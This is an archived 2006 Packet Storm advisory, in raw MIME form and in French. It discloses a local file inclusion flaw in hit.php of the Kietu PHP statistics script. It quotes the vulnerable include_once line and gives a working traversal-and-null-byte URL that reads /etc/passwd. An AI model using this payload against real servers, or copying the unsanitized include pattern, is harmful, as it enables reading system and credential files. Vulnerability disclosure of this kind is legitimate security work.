Kietu.txt

2006-10-02T00:00:00
ID PACKETSTORM:50375
Type packetstorm
Reporter cdg393
Modified 2006-10-02T00:00:00

Description

                                        
                                            `------=_Part_561_6971320.1159049290474  
Content-Type: text/plain; charset=ISO-8859-1; format=flowed  
Content-Transfer-Encoding: quoted-printable  
Content-Disposition: inline  
  
[::] Produit : Kietu  
  
[::] Langage : PHP  
  
[::] Description : Kietu? est un script =E9crit en PHP, qui  
requiert une base de donn=E9e mySQL, et qui vous permet de g=E9n=E9rer et  
consulter les statistiques d'acc=E8s =E0 votre site web.  
  
[::] Site web officiel : http://www.Kietu.net/  
  
[::] Page vuln=E9rable : hit.php  
  
[::] Faille de s=E9curit=E9 : Local File Inclusion  
  
[::] Code vuln=E9rable : ( Ligne 2 ) -> include_once  
$url_hit.'class/kdetect.class.php';  
  
[::] Exploitation :  
http://localhost/kietu/hit.php?url_hit=3D../../../../../etc/passwd%00  
  
@ [::] Cr=E9dit : Avis de s=E9curit=E9 par cdg393 ->  
cdg393_gmail_com :)  
  
------=_Part_561_6971320.1159049290474  
Content-Type: text/html; charset=ISO-8859-1  
Content-Transfer-Encoding: quoted-printable  
Content-Disposition: inline  
  
[::] Produit          &nb=  
sp;      : Kietu<br><br>[::] Langage  &n=  
bsp;           &nbsp=  
;  : PHP<br><br>[::] Description      &n=  
bsp;      : Kietu? est un script =E9crit en PHP, q=  
ui requiert une base de donn=E9e mySQL, et qui vous permet de g=E9n=E9rer e=  
t consulter les statistiques d'acc=E8s =E0 votre site web.  
<br><br>[::] Site web officiel       : <a hre=  
f=3D"http://www.Kietu.net/">http://www.Kietu.net/</a><br><br>[::] Page vuln=  
=E9rable         : hit.php<br><br>[=  
::] Faille de s=E9curit=E9      : Local File Inclu=  
sion<br><br>[::] Code vuln=E9rable      &nbsp=  
;  : ( Ligne 2 ) -> include_once $url_hit.'class/kdetect.class.php'=  
;  
<br><br>[::] Exploitation        &n=  
bsp;   : <a href=3D"http://localhost/kietu/hit.php?url_hit=3D../.=  
./../../../etc/passwd%00">http://localhost/kietu/hit.php?url_hit=3D../../..=  
/../../etc/passwd%00</a><br><br>@ [::] Cr=E9dit    &nbs=  
p;             =  
: Avis de s=E9curit=E9 par cdg393 -> cdg393_gmail_com :)  
  
------=_Part_561_6971320.1159049290474--  
  
`